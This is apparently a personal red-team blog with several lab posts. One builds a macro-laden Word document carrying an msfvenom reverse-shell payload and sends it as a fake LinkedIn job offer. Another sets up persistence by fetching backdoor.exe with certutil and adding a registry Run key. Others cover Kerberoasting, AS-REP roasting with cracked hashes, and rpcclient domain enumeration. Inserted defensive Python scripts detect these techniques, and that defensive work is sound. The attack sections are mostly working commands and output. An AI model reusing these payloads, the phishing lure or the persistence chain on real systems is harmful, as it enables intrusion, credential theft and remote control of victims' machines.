
Thursday, September 30, 2021

RedTeam Challenge: Project S0c14l M3d1a series[II]

 Hi everyone,


In this step we are going to build a malicious Office file that contains embedded malware, using a simple technique.

The attack context is a trojanized file that executes malware internally while the target user views or edits it.


GENERATE MALICIOUS PAYLOAD:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=9999 -f vba > payload2.vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of vba file: 2626 bytes

The first step is to create a malicious payload with the msfvenom tool on the attacker machine; the output format should be a VBA file. This file extension belongs to the Microsoft Office macro scripting language on Windows.


GENERATE DOCUMENT:

I use the "Macro pack" tool to inject the previous malicious payload into the trojan document:


The document file looks like a normal Microsoft Office Word document:
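A defender-side check for this step, added here as an example (it is not part of the original post and not code from the Macro pack project): an OOXML Word document is a zip container, and a macro-enabled one carries a word/vbaProject.bin part and a "macroEnabled" main content type, so a mail gateway or triage script can detect the macro without ever opening Word. The two sample documents are built in memory and are constructed test data, not real files.

```python
import io
import zipfile

# Content type Word assigns to the main part of a macro-enabled (.docm) document.
MACRO_ENABLED_CT = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_CT = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
# Part name under which the compiled VBA project is stored inside the container.
VBA_PROJECT_PART = "word/vbaProject.bin"


def inspect_ooxml(data: bytes) -> dict:
    """Return the macro indicators found in an OOXML document given as raw bytes.

    Raises ValueError when the bytes are not a zip container at all; that is
    worth flagging on its own, since a ".docx" that is not a zip is either a
    legacy OLE2 binary (.doc) or not a Word file.
    """
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not an OOXML (zip) container")
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        try:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        except KeyError:
            content_types = ""
    return {
        "has_vba_project": VBA_PROJECT_PART in names,
        "macro_enabled_content_type": MACRO_ENABLED_CT in content_types,
    }


def verdict(data: bytes, filename: str) -> str:
    """Classify a document: 'clean', 'macro-enabled', or a macro hidden behind a .docx name."""
    ind = inspect_ooxml(data)
    if not (ind["has_vba_project"] or ind["macro_enabled_content_type"]):
        return "clean"
    # Word does not save a VBA project into .docx, so a macro inside a file with
    # that extension means it was renamed or assembled outside Word.
    if filename.lower().endswith(".docx"):
        return "macro in .docx (extension mismatch)"
    return "macro-enabled"


def build_sample(macro: bool) -> bytes:
    """Construct a minimal OOXML container in memory (test data, not a real document)."""
    main_ct = MACRO_ENABLED_CT if macro else PLAIN_DOCX_CT
    overrides = f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
    if macro:
        overrides += '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        + overrides + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            # Placeholder bytes standing in for a compiled VBA project (constructed).
            zf.writestr(VBA_PROJECT_PART, b"\xd0\xcf\x11\xe0 placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for name, macro in (("offer.docx", False), ("offer.docm", True), ("offer.docx", True)):
        print(f"{name:10} -> {verdict(build_sample(macro), name)}")
```

The check is cheap enough to run on every attachment at the gateway; the extension mismatch case is the one to treat as an incident rather than a policy question, since a user-facing ".docx" should never carry a VBA part.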


EDIT AND SEND DOCUMENT:

This is the moment to edit the document with the information you want, for example a job opportunity:



WAIT FOR RESPONSE:

And from the attacker side you only need to wait for the response on the port chosen in the malicious payload and enjoy:


PERSISTENCE:


1. From the attacker machine, generate a new payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.5 LPORT=6969 -f exe > backdoor.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes

The previous command generates a Windows executable named backdoor with the ".exe" extension.

2. From the attacker machine, launch an HTTP server with python3 to share the exe file with the target machine:

python3 -m http.server 8989
Serving HTTP on 0.0.0.0 port 8989 (http://0.0.0.0:8989/) ...
10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -
10.10.10.8 - - [30/Sep/2021 20:25:13] "GET /backdoor.exe HTTP/1.1" 200 -

3. From the target machine, download the binary file with certutil:

certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" %APPDATA%\backdoor.exe
****  En línea  ****
CertUtil: -URLCache comando completado correctamente.


4. Modify the registry on the target machine for persistence:

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c \"start-process $env:APPDATA\backdoor.exe\""


And this is all: on every reboot of the target machine and login by the pwned user, the backdoor.exe binary executes by itself and spawns a cmd shell back to the attacker machine.
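The chain above leaves three distinct traces in process-creation telemetry: an Office application spawning a shell, certutil used as a downloader, and reg.exe writing a Run key. The Python below is an added example (not from the original post): it runs those three checks over constructed Sysmon event 1 / Security 4688 style records and correlates the download and the Run key write on the same host. The field names (ts, host, parent_image, image, command_line) are an assumption, not a real product schema; the WS02 record is a benign certutil use included for contrast.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records. WS01 replays the chain from the post,
# WS02 is a benign certutil invocation. Field names are assumed, not a product schema.
SAMPLE_EVENTS = [
    {"ts": "2021-09-30T20:24:50", "host": "WS01",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"ts": "2021-09-30T20:25:13", "host": "WS01",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r'certutil -f -urlcache "http://10.10.10.5:8989/backdoor.exe" C:\Users\worker2\AppData\Roaming\backdoor.exe'},
    {"ts": "2021-09-30T20:26:02", "host": "WS01",
     "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\reg.exe",
     "command_line": r'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v persistence2 /t REG_SZ /d "powershell.exe -c start-process $env:APPDATA\backdoor.exe"'},
    {"ts": "2021-09-30T20:30:00", "host": "WS02",
     "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -hashfile C:\tools\setup.msi SHA256"},
]

# Command-line patterns for the two persistence steps.
CMDLINE_RULES = {
    # certutil as a downloader: -urlcache together with an http(s) URL.
    "certutil download": re.compile(r"\bcertutil(?:\.exe)?\b.*\s-urlcache\b.*https?://", re.I),
    # reg.exe writing any HKCU/HKLM ...\CurrentVersion\Run or RunOnce value.
    "run key persistence": re.compile(
        r'\breg(?:\.exe)?\s+add\s+"?HK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)\\.*?'
        r"\\CurrentVersion\\Run(?:Once)?\b", re.I),
}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: dict) -> list:
    """Return the detection tags that apply to a single process-creation event."""
    tags = [name for name, rx in CMDLINE_RULES.items() if rx.search(event.get("command_line", ""))]
    # Macro execution: an Office application spawning a scripting host or shell.
    if basename(event.get("parent_image", "")) in OFFICE_APPS and basename(event.get("image", "")) in SHELLS:
        tags.append("office spawned shell")
    return tags


def analyze(events: list, window: timedelta = timedelta(minutes=10)) -> dict:
    """Tag every event, then correlate download + Run key write on one host inside `window`."""
    alerts = [(ev["ts"], ev["host"], tag) for ev in events for tag in classify(ev)]
    per_host = {}
    for ts, host, tag in alerts:
        per_host.setdefault(host, {}).setdefault(tag, []).append(datetime.fromisoformat(ts))
    chains = sorted(
        host for host, tags in per_host.items()
        if any(abs(b - a) <= window
               for a in tags.get("certutil download", [])
               for b in tags.get("run key persistence", []))
    )
    return {"alerts": alerts, "chains": chains}


if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for ts, host, tag in result["alerts"]:
        print(f"{ts} {host} {tag}")
    print("persistence chain on:", ", ".join(result["chains"]) or "none")
```

Each single rule has benign matches (administrators do use certutil and reg.exe), which is why the correlated chain on one host is the alert worth paging on; the Office-to-shell parent/child relationship is the earliest and least ambiguous of the three and is also what Attack Surface Reduction rules block outright.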





And this is all for "step 2" of my first RedTeam challenge execution. I hope you'll share this challenge with me over the next days, and we'll keep in touch.

with best regards, f0ns1



Wednesday, September 29, 2021

RedTeam Challenge: Project S0c14l M3d1a series[I]

Hi everyone,

So far so good; in this case I'm going to challenge myself with a new project that belongs to a RedTeam.

I want to advise everybody that this content does not directly belong to the OSCP certification, but it allows me to implement and assemble the hacking knowledge I learned before in my academic and working life.

For me it's amazing, because nobody explained to me how to do this project, and it can be a very useful and visual example of how a real attacker could access your company network, get admin credentials and steal your data.


PROJECT STRUCTURE

Every project should start with a timing definition and structure:




ATTACK ARCHITECTURE

This is a high level attack architecture definition:

TARGETS DEFINITION:

    - Social Media: LinkedIn
    - Company: CORPORATIVE.domain.local
    - User: Member of the company (I want a new job)
    - Type of attack: contact the target user with an InMail private message / attach a malicious file

   

OBJECTIVES OF THE REDTEAM CAMPAIGN:

There are a couple of objectives, internal and external:

    - The internal objective is to compromise the user and finally, if possible, the company.
    - The external objective is to learn about cybersecurity, explain my knowledge and advise everyone who usually uses this kind of professional social media.

And this is all for my first RedTeam challenge execution. I hope you'll share this challenge with me over the next days, and we'll keep in touch.

with best regards, f0ns1


Sunday, September 19, 2021

Active Directory CORPORATIVE.domain.local Series[VIII] : Kerberoasting && AS-REP-Roasting attacks

Hi everyone!,

So far so good. In this post I'm going to introduce another couple of famous Active Directory attacks: Kerberoasting and AS-REP-Roasting.

These attacks are performed directly from the attacker side (Kali Linux machine) against the Domain Controller of the CORPORATIVE.DOMAIN.local environment:


1. KERBEROASTING ATTACK


The Kerberoasting attack targets an existing account of the target domain that has an SPN configured and enabled.

For more information about SPN (Service Principal Name), you could read the following link:

 https://docs.microsoft.com/es-es/archive/blogs/autz_auth_stuff/what-is-a-spn-and-why-should-you-care


1.1 Kerberoasting detection:


Using the GetUserSPNs.py tool from the attacker machine, with a domain user and valid credentials, we can obtain the users vulnerable to the Kerberoasting attack.




1.2 Prerequisite:

Configure a user vulnerable to the Kerberoasting attack on your domain controller:

- Create a new user for this kind of attack:



- Set an SPN on the target user:


1.3 Kerberoasting exploitation:


- Using the previous Impacket script it is possible to detect the new user with a Service Principal Name, which is going to be the target domain user for the exploitation:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

ServicePrincipalName                                     Name         MemberOf                                                                                       PasswordLastSet             LastLogon  Delegation 
-------------------------------------------------------  -----------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  ----------
CORPORATIVE.DOMAIN.local/SVC_service.CORPORATIVE-DOMAIN  SVC_service  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 14:19:22.218200  <never>               

- TGS Hash request:


- Perform an offline dictionary attack:

 kali@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=KRB5TGS tgs_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status

Passw0rd1        (?)
1g 0:00:20:47 DONE (2021-09-19 15:24) 0.000801g/s 2502Kp/s 2502Kc/s 2502KC/s Passw0r0831..Passw0rd12312
Use the "--show" option to display all of the cracked passwords reliably
Session completed

And finally validate the login for the new user:

kali@kali:~$ crackmapexec smb 10.0.2.1/24 -u"SVC_service" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\SVC_service:Passw0rd1 (Pwn3d!)
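From the defender's side the TGS request above is visible on the Domain Controller as Security event 4769 with ticket encryption type 0x17 (RC4-HMAC, the "etype 23" john reports) issued for a user account's SPN. The script below is an added example, not from the original post or from Impacket: it flags such requests over constructed 4769-style records and raises a second finding when one requester pulls RC4 tickets for several service accounts within a few minutes. Field names follow the event XML (TargetUserName is the requester, ServiceName the account the ticket was issued for); the thresholds and the extra accounts SVC_sql and SVC_web are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                       # etype 23: the cipher john identified above
BURST_THRESHOLD = 3                   # distinct service accounts from one requester ...
BURST_WINDOW = timedelta(minutes=5)   # ... within this window

# Constructed 4769 records (TargetUserName = requesting account, ServiceName = SPN owner).
SAMPLE_4769 = [
    # worker1 reaching a file share: machine-account SPN, AES256 ticket (etype 0x12): normal
    {"time": "2021-09-19T14:20:01", "TargetUserName": "worker1@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "CORPORATIVE-DOM$", "TicketEncryptionType": 0x12, "IpAddress": "10.0.2.30"},
    # worker2 from the attacker box: RC4 tickets for three user service accounts in two minutes
    {"time": "2021-09-19T14:21:10", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_service", "TicketEncryptionType": 0x17, "IpAddress": "10.0.2.15"},
    {"time": "2021-09-19T14:21:11", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_sql", "TicketEncryptionType": 0x17, "IpAddress": "10.0.2.15"},
    {"time": "2021-09-19T14:22:40", "TargetUserName": "worker2@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "SVC_web", "TicketEncryptionType": 0x17, "IpAddress": "10.0.2.15"},
    # TGT renewal against krbtgt with RC4: excluded, it is not a roastable service ticket
    {"time": "2021-09-19T14:23:00", "TargetUserName": "worker1@CORPORATIVE.DOMAIN.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": 0x17, "IpAddress": "10.0.2.30"},
]


def is_roastable_request(ev: dict) -> bool:
    """RC4 service ticket for a user account: the ticket john cracked above looks like this."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"] == RC4_HMAC
            and not svc.endswith("$")          # machine accounts have long random passwords
            and svc.lower() != "krbtgt")       # TGT traffic, not an SPN ticket


def detect(events: list) -> list:
    """One finding per roastable request, plus one 'burst' finding per requester that
    collects tickets for BURST_THRESHOLD or more distinct services inside BURST_WINDOW."""
    findings = []
    per_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            findings.append({"kind": "rc4_ticket", "requester": ev["TargetUserName"],
                             "service": ev["ServiceName"], "time": ev["time"]})
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    # Bulk SPN ticket requests arrive as a burst; interactive users never produce one.
    for (user, ip), reqs in per_requester.items():
        reqs.sort()
        for start, _ in reqs:
            services = {svc for t, svc in reqs if start <= t <= start + BURST_WINDOW}
            if len(services) >= BURST_THRESHOLD:
                findings.append({"kind": "burst", "requester": user, "ip": ip,
                                 "services": sorted(services)})
                break
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_4769):
        print(finding)
```

A single RC4 ticket may still be legitimate for a legacy service, so the burst is the stronger signal. The durable fix is on the account itself: a long random password or a group managed service account, and AES-only encryption types on the SPN account, which also turns the etype condition above into an anomaly in its own right.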


2. AS-REP-ROASTING ATTACK

This attack is executed directly against the Domain Controller too. In order to perform it, the attacker looks for users with the "do not require pre-authentication" property enabled in order to get a TGS Kerberos ticket.


2.1 AS-REP-Roasting detection:

The AS-REP-Roasting attack targets an existing domain account that is vulnerable to this kind of attack because it has the NOT_PRE_AUTH attribute enabled.


2.2 Prerequisite:

Configure a user vulnerable to the AS-REP-Roasting attack on your domain controller:

- Create a new user for this kind of attack:


2.3 AS-REP-Roasting exploitation:

- Looking for vulnerable users:

kali@kali:~$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py  CORPORATIVE.DOMAIN.local/worker2:Passw0rd1
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      
-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------
NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 

- Obtaining a Kerberos pre-auth TGS ticket:


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$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

- Perform an offline attack using hashcat:

sudo hashcat -m18200 '$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$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' -a0 /usr/share/wordlists/rockyou.txt 

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.


$krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9aa1a5ba89900245cfacb6d6367338$c23bb63eba739938bfe4ace881811db58b8982832b14361552efd301f79667714a2d6552eebc8567874e82c2fa16acf7048ec8ea513d2f2dfc6163f19f1d477ea75451b35170b8b6864aa29ba3487d5d4e56b70724b4302dda1bea37615415566d67a4830ab0bde920f41b3d024c607aaf78689b5e06ca5adfcd38df2b3d3314aaf4e4362fd8aef21f12a5646006e9347d1a0372b63d70ad59526ed92fbcd04e3369712697bd2ddd951421587bd2c3e858681d4235ddf4f86affa3a53463c87e0de07a50b10737258b0a7b03112cceefe0eca4eb4b80a4c1a87274410eb151df7db5c438bef86a2e1be4902e56829efd86b5341487e67002f9b4861ab490b0f0386caed6:Passw0rd1

                                                 

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$NP_user@CORPORATIVE.DOMAIN.LOCAL:6a9a...6caed6



- And finally validate the login for the new user:

kali@kali:~$ crackmapexec smb 10.0.2.17 -u"NP_user" -p"Passw0rd1"
SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)
SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DOMAIN.local\NP_user:Passw0rd1 (Pwn3d!)
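The UAC column in the GetNPUsers.py output above (0x410200) is the account's userAccountControl value, and the bit that makes NP_user roastable is 0x400000, documented as DONT_REQ_PREAUTH. The script below is an added example, not from the original post or from Impacket: it parses that table, names the bits that are set, decides whether an account is actually roastable (a disabled account is not, whatever its flags), and emits the LDAP filter an administrator can run to audit the flag directly in the directory. The extra accounts worker2 and old_svc are constructed for contrast.

```python
import re

# userAccountControl bits (ADS_USER_FLAG values) relevant to account auditing.
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x000002
# LDAP bitwise-AND matching rule, used to test a single bit of an integer attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

# Constructed copy of the GetNPUsers.py table printed above (same layout).
SAMPLE_OUTPUT = """\
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

Name     MemberOf                                                                                       PasswordLastSet             LastLogon  UAC      
-------  ---------------------------------------------------------------------------------------------  --------------------------  ---------  --------
NP_user  CN=Propietarios del creador de directivas de grupo,CN=Users,DC=CORPORATIVE,DC=DOMAIN,DC=local  2021-09-19 15:13:32.016064  <never>    0x410200 
"""


def decode_uac(value: int) -> list:
    """Name every known bit set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def asrep_roastable(value: int) -> bool:
    """True when the KDC will answer an AS-REQ without pre-authentication for a usable account."""
    return bool(value & DONT_REQ_PREAUTH) and not value & ACCOUNTDISABLE


def parse_getnpusers_table(text: str) -> dict:
    """Map account name -> UAC value from the Impacket table (columns split on 2+ spaces)."""
    accounts = {}
    for line in text.splitlines():
        cols = re.split(r"\s{2,}", line.strip())
        if len(cols) >= 2 and re.fullmatch(r"0x[0-9a-fA-F]+", cols[-1]):
            accounts[cols[0]] = int(cols[-1], 16)
    return accounts


def ldap_audit_filter() -> str:
    """Filter listing every person object with DONT_REQ_PREAUTH set, for a scheduled audit."""
    return (f"(&(objectCategory=person)"
            f"(userAccountControl:{LDAP_MATCHING_RULE_BIT_AND}:={DONT_REQ_PREAUTH}))")


def audit(accounts: dict) -> dict:
    return {name: {"flags": decode_uac(v), "asrep_roastable": asrep_roastable(v)}
            for name, v in accounts.items()}


if __name__ == "__main__":
    found = parse_getnpusers_table(SAMPLE_OUTPUT)
    # Two constructed accounts for contrast: a normal user and a disabled no-preauth account.
    found.update({"worker2": 0x010200, "old_svc": 0x400202})
    for name, info in audit(found).items():
        print(f"{name:8} roastable={info['asrep_roastable']!s:5} {' | '.join(info['flags'])}")
    print("LDAP audit filter:", ldap_audit_filter())
```

Running the audit filter on a schedule and alerting on any new match is cheaper than watching for the attack itself; when the flag is required by a legacy application, the compensating control is a long random password on that account, since the AS-REP is only as strong as the password it is encrypted with.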



And this is all for this couple of Active Directory attacks. I hope you enjoy my eighth Windows entry and that you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

Saturday, September 18, 2021

Active Directory CORPORATIVE.domain.local Series[VII] : Active Directory Enumeration process

 Hi everyone!,

So far so good. In this post we are going to review enumeration of the Domain Controller, from the attacker computer and from a client host that belongs to the CORPORATIVE.DOMAIN.local environment:

1. OUTSIDE OF DOMAIN

From the attacker side, using a valid user and credentials without admin rights, it's possible to perform the following enumerations:

1.1 RPCCLIENT:

rpcclient -U "worker2%Passw0rd1" 10.0.2.17
rpcclient $> enumdomusers
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[worker1] rid:[0x452]
user:[worker2] rid:[0x453]
rpcclient $> enumdomgroups
group:[Enterprise Domain Controllers de sólo lectura] rid:[0x1f2]
group:[Admins. del dominio] rid:[0x200]
group:[Usuarios del dominio] rid:[0x201]
group:[Invitados del dominio] rid:[0x202]
group:[Equipos del dominio] rid:[0x203]
group:[Controladores de dominio] rid:[0x204]
group:[Administradores de esquema] rid:[0x206]
group:[Administradores de empresas] rid:[0x207]
group:[Propietarios del creador de directivas de grupo] rid:[0x208]
group:[Controladores de dominio de sólo lectura] rid:[0x209]
group:[Controladores de dominio clonables] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Administradores clave] rid:[0x20e]
group:[Administradores clave de la organización] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[RDP] rid:[0x454]

queryuser / querygroup / queryusergroups:

Obtain the groups a specific user belongs to:

rpcclient $> enumdomusers 
user:[Administrador] rid:[0x1f4]
user:[Invitado] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[worker1] rid:[0x452]
user:[worker2] rid:[0x453]
rpcclient $> queryusergroups 0x1f4
        group rid:[0x200] attr:[0x7]
        group rid:[0x201] attr:[0x7]
        group rid:[0x208] attr:[0x7]
        group rid:[0x206] attr:[0x7]
        group rid:[0x207] attr:[0x7]
rpcclient $> querygroup 0x200
        Group Name:     Admins. del dominio
        Description:    Administradores designados del dominio
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
rpcclient $> querygroup 0x208
        Group Name:     Propietarios del creador de directivas de grupo
        Description:    Los miembros de este grupo pueden modificar la directiva de grupo del dominio
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x206
        Group Name:     Administradores de esquema
        Description:    Administradores designados del esquema
        Group Attribute:7
        Num Members:1
rpcclient $> querygroup 0x207
        Group Name:     Administradores de empresas
        Description:    Administradores designados de la empresa
        Group Attribute:7
        Num Members:1
rpcclient $> 


Fully automated recon process: users-memberof-groups

for i in `rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "enumdomusers" | awk -F "rid:" '{ print $2}' | tr -d "[]"`; do
    echo "User rid: $i"
    echo "User data : "
    rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryuser $i"
    echo " User groups: "
    rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryusergroups $i"
    for j in `rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "queryusergroups $i" | awk '{print $2}' | awk -F ":" '{print $2}' | tr -d "[]"`; do
        echo $j
        rpcclient -U "worker2%Passw0rd1" 10.0.2.17 -c "querygroup $j"
    done
done
User rid: 0x1f4
User data : 
        User Name   :   Administrador
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta integrada para la administración del equipo o dominio
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      sáb, 18 sep 2021 19:44:09 CEST
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      sáb, 11 sep 2021 23:18:53 CEST
        Password can change Time :      dom, 12 sep 2021 23:18:53 CEST
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f4
        group_rid:      0x201
        acb_info :      0x00000210
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x0000001a
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x200] attr:[0x7]
        group rid:[0x201] attr:[0x7]
        group rid:[0x208] attr:[0x7]
        group rid:[0x206] attr:[0x7]
        group rid:[0x207] attr:[0x7]
0x200
        Group Name:     Admins. del dominio
        Description:    Administradores designados del dominio
        Group Attribute:7
        Num Members:1
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
0x208
        Group Name:     Propietarios del creador de directivas de grupo
        Description:    Los miembros de este grupo pueden modificar la directiva de grupo del dominio
        Group Attribute:7
        Num Members:1
0x206
        Group Name:     Administradores de esquema
        Description:    Administradores designados del esquema
        Group Attribute:7
        Num Members:1
0x207
        Group Name:     Administradores de empresas
        Description:    Administradores designados de la empresa
        Group Attribute:7
        Num Members:1
User rid: 0x1f5
User data : 
        User Name   :   Invitado
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta integrada para el acceso como invitado al equipo o dominio
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      jue, 01 ene 1970 01:00:00 CET
        Password can change Time :      jue, 01 ene 1970 01:00:00 CET
        Password must change Time:      jue, 14 sep 30828 04:48:05 CEST
        unknown_2[0..31]...
        user_rid :      0x1f5
        group_rid:      0x202
        acb_info :      0x00000215
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x202] attr:[0x7]
0x202
        Group Name:     Invitados del dominio
        Description:    Todos los invitados del dominio
        Group Attribute:7
        Num Members:1
User rid: 0x1f6
User data : 
        User Name   :   krbtgt
        Full Name   :
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Cuenta de servicio de centro de distribución de claves
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      jue, 01 ene 1970 01:00:00 CET
        Logoff Time              :      jue, 01 ene 1970 01:00:00 CET
        Kickoff Time             :      jue, 14 sep 30828 04:48:05 CEST
        Password last set Time   :      dom, 12 sep 2021 00:29:47 CEST
        Password can change Time :      lun, 13 sep 2021 00:29:47 CEST
        Password must change Time:      dom, 24 oct 2021 00:29:47 CEST
        unknown_2[0..31]...
        user_rid :      0x1f6
        group_rid:      0x201
        acb_info :      0x00000011
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...
 User groups: 
        group rid:[0x201] attr:[0x7]
0x201
        Group Name:     Usuarios del dominio
        Description:    Todos los usuarios del dominio
        Group Attribute:7
        Num Members:5
